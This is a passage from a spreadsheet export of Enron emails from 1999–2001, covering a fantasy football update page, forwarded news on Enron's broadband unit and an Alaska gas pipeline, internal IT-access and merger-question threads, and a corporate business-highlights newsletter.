 Reaching the end zone on the ground and through the air, George ran 24 times _x000D_
for 81 yards and a touchdown, while catching four passes for 20 yards and two _x000D_
more scores. George will definitely be the MVP of many Fantasy championship _x000D_
teams this year.   _x000D_
_x000D_
 Jimmy Smith , WR JAC - Fear Updated 12/10/00 _x000D_
 The Jaguars' wideout caught eight passes for 147 yards and a touchdown. He _x000D_
appears to be rasing his level of play just in time for the final rounds of _x000D_
the Fantasy playoffs.      _x000D_
_x000D_
 Napoleon Kaufman , RB OAK - McKay Neal Updated 12/10/00 _x000D_
 Kaufman left Sunday's game against the Jets in the second quarter after _x000D_
injuring his right knee. He was taken to the locker room for further _x000D_
examnination.  _x000D_
_x000D_
 David Patten , WR CLE - Free Agent Updated 12/10/00 _x000D_
 On seven catches, Patten racked up 103 yards and a touchdown. Patten has _x000D_
showed signs of promise this year, but has lacked consistency when _x000D_
healthy.      _x000D_
_x000D_
 Shannon Sharpe , TE BAL - Rocks Updated 12/10/00 _x000D_
 The veteran tight end caught just one pass for seven yards. Trent Dilfer _x000D_
appears to be speading the ball among many WRs, and Sharpe has suddenly _x000D_
become a non-factor in the Baltimore offense.   _x000D_
_x000D_
 Drew Bledsoe , QB NE - FIBSABs Updated 12/10/00 _x000D_
 In a valiant effort, Bledsoe completed 26 of 45 passes for 225 yards with _x000D_
two touchdowns and no interceptions. The veteran QB might continue to perform _x000D_
well in New England's final two games.   _x000D_
_x000D_
 Lamar Smith , RB MIA - Fear Updated 12/10/00 _x000D_
 On 23 carries, Smith ran for 79 yards and the Dolphins' lone touchdown. _x000D_
Despite facing the Tampa Bay run defense, Smith did not let his owners down _x000D_
at a crucial time of year.   _x000D_
_x000D_
 Corey Dillon , RB CIN - Matt Lenhart Updated 12/10/00 _x000D_
 On 18 carries, Dillon picked up only 42 yards. The Cincinnati RB still has a _x000D_
tendency to disappear against the league's better defenses.  _x000D_
_x000D_
 Ryan Wetnight , TE GB - Free Agent Updated 12/10/00 _x000D_
 Wetnight suffered a concussion in Sunday's win over Detroit.  _x000D_
_x000D_
 Matt Hatchette , WR MIN - Free Agent Updated 12/10/00 _x000D_
 Hatchette left Sunday's game in the second half after pulling a muscle on _x000D_
his side.  Troy Walters replaced Hatchette as the third wideout.    _x000D_
_x000D_
 Troy Aikman , QB DAL - Free Agent Updated 12/10/00 _x000D_
 Aikman left Sunday's game in the first half with a concussion. He was _x000D_
replaced by Anthony Wright. Randall Cunningham is the team's emergency QB _x000D_
this week because of his recent groin problems.  _x000D_
_x000D_
 Anthony Wright , QB DAL - Free Agent Updated 12/10/00 _x000D_
 Wright replaced an injured Troy Aikman early in the second quarter of _x000D_
Sunday's game against Washington.  _x000D_
_x000D_
 Jay Fiedler , QB MIA - McKay Neal Updated 12/10/00 _x000D_
 Fiedler suffered an injured left shoulder in Sunday's game against the _x000D_
Buccaneers.  The injury seemed to affect his accuracy as he threw four _x000D_
interceptions in the game.  Keep an eye on his situation.  The injury may _x000D_
warrant you dropping him from your Fantasy lineup next week.       _x000D_
_x000D_
 Steve McNair , QB TEN - Rocks Updated 12/10/00 _x000D_
 McNair was lifted in the fourth quarter of Sunday's game against Cincinnati. _x000D_
Jeff Fisher replaced him with Neil O'Donnell, deciding McNair needed a _x000D_
well-deserved rest to keep him healthy after throwing three TD passes.  _x000D_
_x000D_
 Fred Taylor , RB JAC - Hunter Shively Updated 12/10/00 _x000D_
 Taylor left Sunday's game against Jacksonville in the third quarter with the _x000D_
Jaguars leading 30-3. He seemed to suffer a minor injury to his knee that had _x000D_
been bothering him earlier in the year, but he remained on the sidelines and _x000D_
appeared to be in good condition.   _x000D_
_x000D_
 Chris Greisen , QB ARI - Free Agent Updated 12/10/00 _x000D_
 Greisen replaced an ineffective Dave Brown in the third quarter of Sunday's _x000D_
game at Jacksonville.  _x000D_
_x000D_
More Updates _x000D_
_x000D_
 View?Transactions? _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]?  Make Selection  _x000D_
? [IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
 There are no League Transactions which meet the selected criteria._x000D_
_x000D_
To see all league transactions select "All", "All", "All Teams" from the _x000D_
Transactions, View page. _x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 Breakdown?Schedule? _x000D_
_x000D_
_x000D_
  Eric Bass  _x000D_
_x000D_
  Player  _x000D_
  Pos  _x000D_
  Points  _x000D_
  McNabb, Donovan  _x000D_
 QB _x000D_
 32.0 _x000D_
  Allen, James  _x000D_
 RB _x000D_
 23.0 _x000D_
  Smith, Robert  _x000D_
 RB _x000D_
 6.0 _x000D_
  Harrison, Marvin  _x000D_
 WR _x000D_
 0.0 _x000D_
  Hayes, Donald  _x000D_
 WR _x000D_
 7.0 _x000D_
  Horn, Joe  _x000D_
 WR _x000D_
 10.0 _x000D_
  Nedney, Joe  _x000D_
 K _x000D_
 2.0 _x000D_
  Ravens  _x000D_
 DT _x000D_
 15.0 _x000D_
_x000D_
_x000D_
 [IMAGE] _x000D_
  TOTAL  _x000D_
 ? _x000D_
  95.0  _x000D_
_x000D_
_x000D_
 [IMAGE] _x000D_
 Lions  _x000D_
 DT _x000D_
 6.0 _x000D_
  Grbac, Elvis  _x000D_
 QB _x000D_
 20.0 _x000D_
  Anders, Kimble  _x000D_
 RB _x000D_
 0.0 _x000D_
  Davis, Terrell  _x000D_
 RB _x000D_
 0.0 _x000D_
  Morris, Sylvester  _x000D_
 WR _x000D_
 3.0 _x000D_
  Robinson, Marcus  _x000D_
 WR _x000D_
 0.0 _x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
  at Fear  _x000D_
_x000D_
  Player  _x000D_
  Pos  _x000D_
  Points  _x000D_
  George, Jeff  _x000D_
 QB _x000D_
 14.0 _x000D_
  George, Eddie  _x000D_
 RB _x000D_
 28.0 _x000D_
  Smith, Lamar  _x000D_
 RB _x000D_
 13.0 _x000D_
  Holt, Torry  _x000D_
 WR _x000D_
 17.0 _x000D_
  Muhammad, Muhsin  _x000D_
 WR _x000D_
 10.0 _x000D_
  Smith, Jimmy  _x000D_
 WR _x000D_
 20.0 _x000D_
  Gramatica, Martin  _x000D_
 K _x000D_
 11.0 _x000D_
  Rams  _x000D_
 DT _x000D_
 4.0 _x000D_
_x000D_
_x000D_
 [IMAGE] _x000D_
  TOTAL  _x000D_
 ? _x000D_
  117.0  _x000D_
_x000D_
_x000D_
 [IMAGE] _x000D_
 Redmond, J.R.  _x000D_
 RB _x000D_
 3.0 _x000D_
  Griese, Brian  _x000D_
 QB _x000D_
 0.0 _x000D_
  Bettis, Jerome  _x000D_
 RB _x000D_
 3.0 _x000D_
  Chrebet, Wayne  _x000D_
 WR _x000D_
 10.0 _x000D_
  Levens, Dorsey  _x000D_
 RB _x000D_
 0.0 _x000D_
  Testaverde, Vinny  _x000D_
 QB _x000D_
 7.0 _x000D_
_x000D_
_x000D_
_x000D_
Copyright 2000 Commissioner.COM Inc and SportsLine.com Inc._x000D_
Your site is always at http://football.commissioner.com/ene_x000D_
_x000D_
FB10SP_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 Sep 1999 04:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Meeting with Mark Haedicke and Brad Dunn</t>
  </si>
  <si>
    <t>contact person Carol Kincannon x37906</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 05:16:57 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jonathan.mckay@enron.com', 'vladi.pimenov@enron.com', 'scott.neal@enron.com', 'brad.mckay@enron.com'})</t>
  </si>
  <si>
    <t>FW: We contacted the offender</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jeffrey Sprecher [mailto:jeffrey.sprecher@intcx.com]_x000D_
Sent: Monday, November 19, 2001 4:54 PM_x000D_
To: Zipper, Andy_x000D_
Subject: We contacted the offender_x000D_
_x000D_
_x000D_
Andy,_x000D_
_x000D_
We pulled the log ... found the guy ... and told him to knock it off.  _x000D_
Please let me know if there is a repeat performance.  _x000D_
_x000D_
Best regards, Jeff</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 09:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Telecom Services: Broadband Services: USA:    Analysts still_x000D_
 bullish on Enron broadband unit ...</t>
  </si>
  <si>
    <t xml:space="preserve">don't sell just yet._x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 03/15/2001 05:08 PM -----_x000D_
_x000D_
	Margo Reyna_x000D_
	03/15/2001 04:56 PM_x000D_
		 _x000D_
		 To: Sue Nord/NA/Enron@Enron, Scott Bolton/Enron Communications@Enron _x000D_
Communications, Lara Leibman/Enron Communications@Enron Communications, _x000D_
Donald Lassere/Enron Communications@Enron Communications, Mona L _x000D_
Petrochko/NA/Enron@Enron, Barbara A Hueter/NA/Enron@Enron, Jeff _x000D_
Dasovich/NA/Enron@Enron, Susan M Landwehr/NA/Enron@Enron, Marchris _x000D_
Robinson/NA/Enron@Enron, Ricardo Charvel/NA/Enron@Enron, Stephen D _x000D_
Burns/Corp/Enron@ENRON, Xi Xi/Enron Communications@Enron Communications, _x000D_
Allison Navin/Corp/Enron@ENRON, John _x000D_
Neslage/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Eric Benson/NA/Enron@ENRON, _x000D_
Karen Huang/Enron Communications@Enron Communications, Matthew _x000D_
Jachimiak/HOU/ECT@ECT, John Neslage/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
		 cc: _x000D_
		 Subject: Telecom Services: Broadband Services: USA:    Analysts still _x000D_
bullish on Enron broadband unit ..._x000D_
_x000D_
Margo Reyna_x000D_
Regulatory Analyst_x000D_
Enron Corp., Government Affairs_x000D_
Phone:  713-853-9191_x000D_
_x000D_
----- Forwarded by Margo Reyna/NA/Enron on 03/15/2001 04:56 PM -----_x000D_
_x000D_
	djcustomclips@djinteractive.com_x000D_
	03/15/2001 04:54 PM_x000D_
	Please respond to nobody_x000D_
		 _x000D_
		 To: 123363@WCTOPICS.djnr.com_x000D_
		 cc: _x000D_
		 Subject: Telecom Services: Broadband Services: USA:    Analysts still _x000D_
bullish on Enron broadband unit ..._x000D_
_x000D_
_x000D_
_x000D_
USA: Analysts still bullish on Enron broadband unit prospects. _x000D_
By C. Bryson Hull _x000D_
  _x000D_
03/15/2001 _x000D_
Reuters English News Service _x000D_
(C) Reuters Limited 2001. _x000D_
HOUSTON, March 15 (Reuters) - Wall Street took a hard look at Enron Corp.'s _x000D_
content delivery plans this week after it ended its video-on-demand deal with _x000D_
Blockbuster Inc. , but remained largely unfazed by the failure of the _x000D_
flagship deal, analysts said on Thursday._x000D_
On balance, most analysts viewed the busted 20-year exclusive agreement as _x000D_
disappointing, but by no means a fatal blow to Enron Broadband Services' _x000D_
(EBS) budding content delivery segment. _x000D_
Most reiterated buy or strong buy ratings for the Houston company and _x000D_
maintained bullish earnings targets for the Enron Broadband Services division._x000D_
But all are awaiting an indication of how Enron will reconfigure the content _x000D_
delivery initiative._x000D_
"I think Blockbuster represented kind of an anchor tenant for the broadband _x000D_
business, so they have lost a contract that was important," said Jeff _x000D_
Dietert, an analyst with Houston investment house Simmons and Co._x000D_
Now EBS will have to pursue smaller contracts to make up the loss, which _x000D_
could mean a longer road to create as big a book of business, Dietert said._x000D_
EBS executives have said they expect to have $1 billion in total contracted _x000D_
business by the end of 2001._x000D_
CHASING MORE CONTRACTS TO FILL VOID_x000D_
EBS Chairman and Chief Executive Officer Kenneth Rice on Friday said his _x000D_
division is already pursuing deals with content providers to send on-demand _x000D_
games, movies, music and television over the Enron network._x000D_
UBS Warburg analyst Ronald Barone, in a research note released Monday, said _x000D_
he still believes Enron will hit the $1 billion mark in 2001._x000D_
"Though this announcement is clearly a disappointment we have a great deal of _x000D_
confidence in the judgment of Enron's senior management and of the upside _x000D_
associated with this business," Barone wrote._x000D_
His report reiterated a strong buy recommendation and 12-month stock price _x000D_
target of $102 a share, with EBS accounting for $25 of that._x000D_
One analyst remained skeptical of the content delivery plans._x000D_
"Where they go from here is one of things they have to tell the market in a _x000D_
convincing fashion," said Commerzbank Securities analyst Andre Meade, who _x000D_
raised Enron to accumulate from hold on Thursday._x000D_
But he also cut earnings targets for the EBS segment to $8.40/share because _x000D_
of the failed Blockbuster deal._x000D_
Heady cash-flow projections figured heavily in Enron's guidance for 2001, _x000D_
which called for a stock price of $126, of which EBS would account for $40, _x000D_
Meade said._x000D_
Meade, whose company initiated coverage on Enron in late May 2000, had been _x000D_
alone among Enron analysts in keeping a hold rating on the stock._x000D_
Merrill Lynch analyst Donato Eassey on Monday released a note reiterating his _x000D_
buy recommendation with a $99/share price target._x000D_
"While the separation from such a high-profile name is disappointing, we do _x000D_
not view this as negative," Eassey wrote. "This could in fact actually _x000D_
accelerate Enron's content delivery strategy."_x000D_
Eassey pointed out that Enron and Blockbuster's trial in Seattle, Salt Lake _x000D_
City, New York and Portland, Ore., proved Enron can deliver movies on demand._x000D_
That gives them a track record to show to potential customers like movie _x000D_
studios and other entertainment concerns that want to provide content _x000D_
directly through their Web sites, he said._x000D_
Enron's stock closed on Thursday at $66.53, up $3.78, compared with its _x000D_
52-week range of $59.99 to $90.5626. _x000D_
_x000D_
Folder Name: Telecom Services: Broadband Services _x000D_
Relevance Score on Scale of 100: 80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1 Dow Jones &amp; Company, Inc. All Rights Reserved _x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Aug 2001 18:07:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Your Approval is Overdue: Access Request for_x000D_
 martha.keesler@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">Please follow up on this for me - I shouldn't have to approve things for Martha since she's not in our group._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	ARSystem &lt;ARSystem@mailman.enron.com&gt;@ENRON [mailto:IMCEANOTES-ARSystem+20+3CARSystem+40mailman+2Eenron+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Tuesday, August 28, 2001 7:25 PM_x000D_
To:	Taylor, Mark E (Legal)_x000D_
Subject:	Your Approval is Overdue: Access Request for martha.keesler@enron.com_x000D_
_x000D_
This request has been pending your approval for  2 days.  Please click http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000056181&amp;Page=Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000056181_x000D_
Request Create Date : 8/27/01 3:36:36 PM_x000D_
Requested For       : martha.keesler@enron.com_x000D_
Resource Name       : Live Link ENA_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 10:09:21 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'karen.denne@enron.com', "tim.o'rourke@enron.com"})</t>
  </si>
  <si>
    <t>I didn't know we were.  There are 18 new questions in the box since Wednesday.  Karen?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	O'rourke, Tim  _x000D_
Sent:	Monday, November 26, 2001 12:00 PM_x000D_
To:	Clark, Mary_x000D_
Cc:	James, Terrie; Cash, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
Mary, _x000D_
Are we still planning on taking the questions@enron site away?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Clark, Mary  _x000D_
Sent:	Monday, November 26, 2001 10:20 AM_x000D_
To:	O'rourke, Tim_x000D_
Subject:	FW: _x000D_
_x000D_
Tim, another question about stock options. _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Reagor, Rodney  _x000D_
Sent:	Monday, November 26, 2001 8:45 AM_x000D_
To:	Palmer, Sarah; Clark, Mary_x000D_
Subject:	FW: _x000D_
_x000D_
We should probably put the questions@enron.com address at the top of the Q&amp;A. That would make it easier to find._x000D_
_x000D_
In the mean time, can you forward this question to the right people?_x000D_
_x000D_
Thanks,_x000D_
Rodney_x000D_
_x000D_
----_x000D_
Rodney Reagor_x000D_
Corporate Marketing_x000D_
Enron Corp_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Jones, Michael B  _x000D_
Sent:	Monday, November 26, 2001 8:39 AM_x000D_
To:	DL-Webteam_x000D_
Subject:	_x000D_
_x000D_
_x000D_
Options_x000D_
I don't see a path to ask questions about the merger, so I'm submitting here.  Will the merger ratio be applied to our option strike prices as well?  (e.g., for Enron options with a strike price of around $84, will the new strike price of these options be multiplied by .2685 for a new strike price of $22.55 in the new company's stock?)_x000D_
_x000D_
Cost Savings_x000D_
I moved to 3 Allen Center about a year and a half ago and was assigned a new phone number.  However, I occasionally receive forwarded calls from my old number (853-4792, I think).  It appears two direct dial numbers are being maintained for me, and likely for all employees who ever had an EB number and moved to 3AC.  We could save some money by getting rid of the old numbers._x000D_
_x000D_
Thanks, _x000D_
_x000D_
_x000D_
Michael B. Jones_x000D_
Global Employee Services_x000D_
Tel.  713-345-5859_x000D_
Fax. 713-646-9501</t>
  </si>
  <si>
    <t>Thu, 12 Jul 2001 11:53:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gabriel.chavez@enron.com', 'john.millar@enron.com', 'eric.gadd@enron.com', 'kevin.hyatt@enron.com', 'michael.ratner@enron.com'})</t>
  </si>
  <si>
    <t>FW: New Iowa Pipeline</t>
  </si>
  <si>
    <t>Eric,_x000D_
_x000D_
FYI--One of the Iowa congresswomen told us BP was out in her district buying r-o-w in her district in northeastern Iowa.  This appears to answer the question of what is going on.  What is our status of involvement in the Alaskan Gas scene?_x000D_
_x000D_
Lorna_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Stanton, Lon  _x000D_
Sent:	Thursday, July 12, 2001 12:49 PM_x000D_
To:	Miller, Mary Kay; Nelson, Michel; Neubauer, Dave; McGowan, Mike W.; Fossum, Drew; Talcott, Jim; Porter, Gregory J.; Gilbert, Tom; Poock, Brian; team.waterloo plant@enron.com; Dushinske, John; Brennan, Lorna; Lehan, Tom; Shepherd, Richard; Jensen, Beth_x000D_
Subject:	New Iowa Pipeline_x000D_
_x000D_
Here is some additional information that we picked up regarding the pipeline right-of-way acquisition or discussion activities said to be going on in Iowa and it seems to fit the North American Natural Gas Pipeline Group project.   This is prompting some talk by legislators to try again in the next session of the Iowa Legislature to toughen up Iowa's condemnation laws.   Should this in anyway influence what we contemplating in regard to the Iowa land restoration rules?_x000D_
_x000D_
--It would not be an oil line_x000D_
--Prudhoe Bay would be the source of supply_x000D_
--It could involve a partnership of BP, Phillips and Exxon_x000D_
--Its route would be to the northeast of Alliance pipeline_x000D_
--It could be as large as a 50" line_x000D_
--Its could be about a $10B project_x000D_
_x000D_
This seems to fit this project:_x000D_
_x000D_
Alaskan Gas Pipeline Project_x000D_
Phillips Alaska, Inc._x000D_
ExxonMobil Production Company_x000D_
BP Exploration (Alaska) Inc._x000D_
23 April 2001_x000D_
_x000D_
_x000D_
AlasCan Group Wins Conceptual_x000D_
Engineering Work for Alaska Pipeline_x000D_
_x000D_
DALLAS--(BUSINESS WIRE)--April 23, 2001--The North American Natural Gas Pipeline Group (NANGPG), a consortium of ExxonMobil, BP and Phillips, has awarded a conceptual engineering contract for a multi-billion dollar pipeline that will stretch from Alberta to Chicago, Illinois, to a five-company joint venture called The AlasCan Group. The group includes Kellogg Brown &amp; Root, Colt Engineering Corporation, Natchiq, NANA/Colt Engineering, and Michael Baker Corp. The conceptual engineering work will allow the client to submit regulatory and environmental permits required to the U.S. Federal Energy Regulatory Commission and Canada's National Energy Board so that the project can proceed._x000D_
_x000D_
The approximately 1,800-mile stretch of pipeline, designated the Alberta to Market segment by NANGPG, runs from near Edmonton, Alberta, to Chicago. This pipeline is part of NANGPG's plan to deliver natural gas from Prudhoe Bay to the lower 48 states and is a continuation of the pipeline from Prudhoe Bay to Alberta. The project will consist of a large diameter pipeline with compressor stations and related facilities._x000D_
_x000D_
The work will be executed in Colt's offices in Calgary, Canada, with participation of specialists from the five organizations._x000D_
_x000D_
Kellogg Brown &amp; Root is an international, technology-based engineering and construction company providing a full spectrum of industry-leading services to the hydrocarbon, chemical, energy, and forest products industries. The company is a business unit of Halliburton Company, the world's largest provider of products and services to the petroleum and energy industries. The company's World Wide Web site can be accessed at www.halliburton.com._x000D_
_x000D_
Colt Engineering Corporation, Canada's largest hydrocarbon engineering contractor, provides multi-discipline engineering, procurement, construction management and construction services to the upstream and downstream oil and gas industries in North America and internationally. Colt employs over 2,000 people in Canada and Alaska and has specialized expertise in arctic project development and large diameter transmission pipeline systems. Additional information is available at www.colteng.com_x000D_
_x000D_
Michael Baker Corporation (AMEX:BKR) provides engineering and energy expertise for public and private sector clients worldwide. The firm's primary services include engineering design for the transportation and civil infrastructure markets, operation and maintenance of oil and gas production facilities, architecture, environmental services, and construction management. Baker employs more than 3,700 in over 30 offices across the United States and internationally. For additional information, please visit www.mbakercorp.com._x000D_
_x000D_
Natchiq Inc., a subsidiary of the Arctic Slope Regional Corporation, is one of the country's leading providers of engineering, construction and support services to the global energy industry. The Engineering News Record has consistently ranked Natchiq as one of the top 15 petroleum contractors in the nation._x000D_
_x000D_
NANA/Colt Engineering, LLC is an Alaska based company providing engineering, procurement, and construction management services to the Alaska oil and gas industry. NANA/Colt Engineering, LLC also supports the non-oil sector with a full spectrum of engineering and construction management related services._x000D_
_x000D_
?2001 Bloomberg L.P. All rights reserved.</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 05:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gordon.heaney@enron.com', 'kim.theriot@enron.com', 'pamela.sonnier@enron.com', 'bruce.mills@enron.com', 'scott.tackett@enron.com', 'jean.bell@enron.com', 'andrea.guillen@enron.com', 'larry.hunter@enron.com', 'souad.mahmassani@enron.com', 'melissa.murphy@enron.com', 'jefferson.sorenson@enron.com', 'rhonda.denton@enron.com', 'diane.anderson@enron.com', 'sheetal.patel@enron.com', 'david.dupre@enron.com', 'derek.bailey@enron.com', 'jarrod.cyprow@enron.com', 'kevin.meredith@enron.com', 'laurel.adams@enron.com'})</t>
  </si>
  <si>
    <t>Financial Trading Agreements Database Link</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the link that will allow you access to referenced database.  _x000D_
Please note, that we have just upgraded the database to add the ISDA _x000D_
definitions, branch offices approved for trading, and market disruption _x000D_
provisions.  This information should be inputted for the new master swap _x000D_
agreements on a going forward basis, but we still need to go back and _x000D_
repopulate the data for the existing master swap agreements._x000D_
_x000D_
Also, FYI, the "See" drop down is our nickname for the name changes and _x000D_
mergers reference.  If an item is filled in for that entity it should show _x000D_
you any prior or new names for the counterparty.  _x000D_
_x000D_
If there is anyone else who would like the link, please let me know and I _x000D_
will forward it to them._x000D_
_x000D_
We hope you find the information provided in this database helpful._x000D_
_x000D_
_x000D_
Link --&gt;_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 23:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>BUSINESS HIGHLIGHTS_x000D_
_x000D_
Weather Group_x000D_
_x000D_
Let=01,s give a big round of applause to the Weather Team!  Environmental=_x000D_
=20_x000D_
Finance Magazine ranked the weather group #1 in Online Services and #1 Deal=_x000D_
er=20_x000D_
in the United States and Europe.  Gary Taylor, manager in weather trading,=_x000D_
=20_x000D_
comments, "The "Best Dealer" award reflects our counterparties' appreciatio=_x000D_
n=20_x000D_
for the significant effort we have made to drive the growth of our market b=_x000D_
y=20_x000D_
making two-sided markets where other companies are only willing to quote=20_x000D_
either a bid or an offer.  This award also reflects the innovative nature o=_x000D_
f=20_x000D_
everyone on our desk, and their ability to price non-standard structures fo=_x000D_
r=20_x000D_
our customers.  It is truly a team award.  The "Best Online Dealer" award i=_x000D_
s=20_x000D_
simply another testament to the unparalleled success of EnronOnline.  By=20_x000D_
providing tight, two-way markets online, we have provided two critical=20_x000D_
elements to generate growth in our market: 1) an element of price discovery=_x000D_
,=20_x000D_
and 2) a quick and easy way to transact."_x000D_
_x000D_
The Weather Risk Management group launched a new product this week:  Power=_x000D_
=20_x000D_
Demand swaps.  These contracts use power demand as an index and allow power=_x000D_
=20_x000D_
market participants (generators, btu distributors, marketers, etc...) to=20_x000D_
mitigate volumetric exposures.  The first contract the desk offered is for=_x000D_
=20_x000D_
the PJM power pool.  On EnronOnline, weekly swaps are available and the des=_x000D_
k=20_x000D_
has placed option contracts on this index in the broker market.  Inquiries=_x000D_
=20_x000D_
regarding this product should be directed to Claudio Ribeiro (product=20_x000D_
manager) x37313, Gary Taylor x31511, or Valter Stoiani x36906._x000D_
_x000D_
Competitive Analysis and Business Controls_x000D_
eSource, Enron's premier corporate-wide research group, launched their new=_x000D_
=20_x000D_
intranet product, eSearch, on December 1, 2000.  eSource's team of=20_x000D_
specialized researchers have created a web site to bring information and=20_x000D_
research to every employee's desktop.  The eSearch web site offers many lin=_x000D_
ks=20_x000D_
to information resources, access to research databases, specialized searche=_x000D_
s,=20_x000D_
sites to purchase books, articles, and reports, and training.  Employees ca=_x000D_
n=20_x000D_
use the web site to conduct their own research or as a vehicle to submit=20_x000D_
research requests.  eSource's researchers and industry specialists are=20_x000D_
available to all Enron business units to provide timely and cost efficient=_x000D_
=20_x000D_
research, to work with individuals or groups to fulfill one time research=_x000D_
=20_x000D_
requests, or to design ongoing, customized monitoring projects or news=20_x000D_
updates._x000D_
_x000D_
Enron Global Markets Fundamentals_x000D_
EGM Fundamentals is quickly building a team of expert analysts and associat=_x000D_
es=20_x000D_
to work directly with traders and marketers.  The team is already busy=20_x000D_
analyzing various commodities and market situations.  For example, an=20_x000D_
initiative is underway to analyze current negative fractionation spreads in=_x000D_
=20_x000D_
the market resulting from rising natural gas prices.  Web sites to host thi=_x000D_
s=20_x000D_
analytical information are currently in development for all EGM commodities=_x000D_
. =20_x000D_
These sites will provide research and analysis, weather, publications, and=_x000D_
=20_x000D_
any other information that will assist in decision-making or identification=_x000D_
=20_x000D_
of potential commercial opportunities.  For questions or requests regarding=_x000D_
=20_x000D_
fundamental research, contact Jennifer Fraser at x34759.  For questions or=_x000D_
=20_x000D_
suggestions regarding the web sites, contact Heather Purcell at x54057._x000D_
_x000D_
Austin Energy_x000D_
Austin Energy and Enron Sandhill, L.L.C, a subsidiary of Enron North Americ=_x000D_
a=20_x000D_
broke ground November 29, 2000 for the construction of the Sand Hill Energy=_x000D_
=20_x000D_
Center, a 180-megawatt peaking electrical generation facility.  Located in=_x000D_
=20_x000D_
eastern Travis County, the Sand Hill Energy Center will be a natural gas=20_x000D_
fired facility that will operate primarily during peak demand periods.  The=_x000D_
=20_x000D_
$93.7 million project will feature four 45-megawatt General Electric gas=20_x000D_
turbines and will be operational May 1, 2001._x000D_
_x000D_
_x000D_
NEWS FROM THE GLOBALFLASH_x000D_
_x000D_
Coal_x000D_
The London dry cargo seafreight team traded 1 million metric tonne of=20_x000D_
Capesize vessel swaps via EOL in one day, (Wednesday 28th November). The de=_x000D_
al=20_x000D_
was created by combining OTC options and a physically related cash market=_x000D_
=20_x000D_
deal.  This helps to bring our YTD EOL to just under 2.5 mln tonne._x000D_
_x000D_
Off-shore wind energy deal_x000D_
Enron Wind has signed a power purchase agreement with Swedish energy compan=_x000D_
y=20_x000D_
Graninge.  According to the agreement, Graninge will deliver electricity to=_x000D_
=20_x000D_
consumers using Enron's wind power plants in southern Sweden.  Enron Wind's=_x000D_
=20_x000D_
Utgrunden off-shore wind park, completed this year, will generate in the=20_x000D_
region of 38,000 megawatt hours of electricity, or enough for around 6,000=_x000D_
=20_x000D_
average homes between the mainland and the island of Oland on the southeast=_x000D_
=20_x000D_
tip of Sweden.  In an announcement this week, Graninge stated that it plans=_x000D_
=20_x000D_
to market the power to consumers as 'green' energy._x000D_
_x000D_
Happy 1st Birthday EnronOnline!_x000D_
This week saw EnronOnline celebrate its first birthday.  During the course =_x000D_
of=20_x000D_
its first year, EnronOnline has passed a number of milestones including the=_x000D_
=20_x000D_
addition of a range of new functionalities for customers on the site. =20_x000D_
EnronOnline has now come of age, having surpassed the $274 billion mark in=_x000D_
=20_x000D_
notional value in November.  This represents a total of 478,695 transaction=_x000D_
s=20_x000D_
since the site was launched on 29 November 1999._x000D_
_x000D_
The first anniversary was marked by giving the media guest access to=20_x000D_
EnronOnline in Europe.  A team from Reuters was invited into Enron House to=_x000D_
=20_x000D_
receive a full demonstration of EnronOnline and as of today will be able to=_x000D_
=20_x000D_
quote in reports live prices from EnronOnline.  Other media outlets are bei=_x000D_
ng=20_x000D_
invited to obtain guest access during the coming weeks as the word of=20_x000D_
EnronOnline's success continues to spread..._x000D_
_x000D_
Australia_x000D_
Enron Australia continues to assist in the region in a supportive role. =20_x000D_
Elliott Katz worked on the GEM migration in Singapore last week with an IT=_x000D_
=20_x000D_
team from London, Oslo and Singapore.  Approximately 40 users, including=20_x000D_
Traders, were migrated to Windows 2000 and the CORP domain.  This is an=20_x000D_
important step for the Asia Pacific region, as it brings the three biggest=_x000D_
=20_x000D_
offices (Singapore, Sydney and Tokyo) into line with corporate standards fo=_x000D_
r=20_x000D_
desktop computing._x000D_
_x000D_
Japan_x000D_
E-Power, a JV between Enron and Japanese finance company Orix, has announce=_x000D_
d=20_x000D_
proposals for a 2000MW gas-fired power plant at Mutsu-Ogawara, an industria=_x000D_
l=20_x000D_
area  in northern Japan.   A feasibility study will be undertaken to define=_x000D_
=20_x000D_
how the project will go forward and this may include the development of an=_x000D_
=20_x000D_
LNG terminal in the vicinity.  The nature of the permitting process is such=_x000D_
=20_x000D_
that the plant would not begin operations for six to seven years.  This=20_x000D_
project is just one of several options that E-Power are working on in Japan=_x000D_
._x000D_
_x000D_
_x000D_
